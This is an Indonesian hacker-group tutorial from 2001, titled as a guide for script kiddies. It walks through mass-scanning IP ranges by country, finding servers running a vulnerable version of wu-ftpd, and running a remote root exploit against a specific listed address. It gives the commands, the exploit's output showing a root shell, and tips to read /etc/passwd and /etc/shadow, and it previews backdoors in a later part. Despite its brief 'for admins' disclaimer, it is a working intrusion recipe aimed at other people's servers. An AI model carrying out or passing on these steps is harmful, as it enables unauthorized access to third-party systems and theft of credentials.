======================================================================
Bagaimana Menggunakan (wu-ftpd) Remote Eksploit
Script Kiddies Tutorial Bagian 3
oleh : cbug aka CyberBug - Kecoak Elektronik
Pertengahan Februari 2001
======================================================================

Pemberitahuan :
1. Artikel ini dimaksudkan untuk bahan pelajaran para admin dan siapa
   saja yang ingin mengembangkan pengetahuan networking/internet mereka.
2. Kecoak Elektronik tidak bertanggung jawab atas penyalah gunaan artikel
   ini.
3. Kecoak Elektronik tetap menyertakan dan tidak menghapus Nama Penulis
   eksploit/script dengan harapan pembaca juga tetap menyertakan kredit
   untuk mereka, jangan mengganti nama2 penulis artikel/eksploit/script
   dengan nama anda dengan harapan nanti dianggap hacker.
 

Akhirnya! ... setelah lama menimbang2 saya memutuskan melepas artikel ini 
demi kejayaan para script kiddies ;P dan supaya script kiddies lainnya 
tidak merasa bahwa cuma mereka doang yang jagoan ... hehehe.

Nah ... mulai darimana kita? ... mmm ... singkat saja remote exploit 
adalah program/eksploit yang jika dijalankan dari mesin kamu dengan 
sasaran server tertentu, akan mengakibatkan anda mendapatkan root shell 
di mesin/server sasaran yang berarti kamu mempunyai akses root dimesin 
tsb (asik ya?) ini yang disebut cracking (beberapa kiddie menyebutnya 
hacking ... tapi bukan itu namanya yg benar cracking ... hehehe) dan yang 
make eksploit itu disebut script kiddie :P~ 
BTW ... semua instruksi ini harus dijalankan di mesin linux/*nix.

A. Mass Target Scanning
Untuk bisa mendapatkan sasaran tentu saja kita harus punya daftar IP yang 
akan di crack ... ya kan? ... nah daftar IP itu bisa saja berupa kumpulan 
IP yang kamu sudah tahu atau punya teman2 kamu dan kamu simpan di satu 
file.
Tapi untuk mudahnya kita bisa menggunakan program ADMz0ne dari ADM Crew 
untuk mendapatkan daftar IP yang kita inginkan.

1. Download precompiled binary program z0ne dari site Kecoak
2. Kalau anda download precompiled jangan lupa : ~$ chmod +x z0ne
3. Misalnya kamu ingin dapat list IP dari 
   a. Phillipines (.ph) :
      nohup ./z0ne -o ph > ph.log &
   b. Site Commercial di Afrika Selatan
      nohup ./z0ne -o co.za > co.za.log &
   c. Dan lain-lain ... coba bereksperimen dengan domain
   Note : nohup dan & di awal dan akhir perintah adalah untuk 
   membackground proses scanning, ketik : man nohup kalo ingin tahu
   lebih banyak.
4. Untuk contoh ini misalnya anda berhasil mendapatkan list IP dari
   Phillipines (.ph) dan disimpan di file ph.log
   Isinya kira2 seperti berikut ini :
   ~$ cat ph.log
   210.23.230.195
   210.23.234.33
   210.23.234.65
   210.23.230.193
   203.167.64.2
   203.167.64.3
   ---dst---

B. Scanning server yang mempunyai wufptd hole

1. Download precompiled binary program wu-scan dari site Kecoak
2. Atau anda bisa download source nya wu-scan.c kemudian compile:
   gcc -o wu-scan wu-scan.c
3. Kalau anda download precompiled jangan lupa : ~$ chmod +x wu-scan
4. Scan IP list yang sudah didapat sebelumnya (ph.log)
   nohup ./wu-scan ph.log &
5. Hasil akhirnya akan dituliskan di file wu-scan.log
   Hasilnya kira2 seperti ini :

   210.23.234.42: wu-2.6.0(1)
   203.176.29.195: wu-2.6.0(1)
   208.160.224.133: Vulnerable wu-2.6.0(1) running on RH 6.2

   IP yang bisa di crack adalah yang ada tulisan Vulnerable blah ;)
   Untuk mudahnya kamu bisa menaruh IP yg vulnerable di satu file lain
   misalnya ph.vul
   ~$ cat wu-scan.log | grep Vulnerable > ph.vul

C. Cracking ... let's party!

1. Download precompiled binary program wuftpdsp dari site Kecoak
2. Atau anda bisa download source nya wuftpdsp.c kemudian compile:
   gcc -o wuftpdsp wuftpdsp.c
3. Kalau anda download precompiled jangan lupa : chmod +x wuftpdsp
4. Untuk me-remote exploit 208.160.224.133 ketik :
   ./wuftpdsp -s0 -t 208.160.224.133

--- ini yg akan keliatan di layar ---
Target: 208.160.224.133 (ftp/): RedHat 6.2 (?) with wuftpd 
2.6.0(1) from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152

loggin into system..
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS 
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)
STEP 5 : Sending code.. this will take about 10 seconds.
Press ^\ to leave shell
blah ...
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
--- habis ---

6. Kamu bisa coba beberapa perintah standar seperti ls :P~ di root shell
   kamu yang baru, atau perintah lain yang agak bermanfaat ;) seperti
   cat /etc/passwd dan cat /etc/shadow
7. Dan seperti pesan nya tekan CTRL dan \ kalau ingin keluar dari root 
   shell (dan kembali ke shell di mesin kamu sendiri.
8. Selain itu? kan ada trojan/backdoor dll, begitu mungkin kamu bertanya 
   ehm ... ikuti saja Script Kiddies Tutorial berikutnya dan menjauhlah 
   dari masalah ... OK?

D. wu-ftpd eksploit lain.
   Buat yang masih penasaran dengan hasil wuftpdsp, coba gunakan wu-ftpd
   eksploitnya TESO Team - 7350wu
   Cara pakainya kamu cari sendiri ... anggap saja PR.

Salam,
cbug



    Source: geocities.com/f173s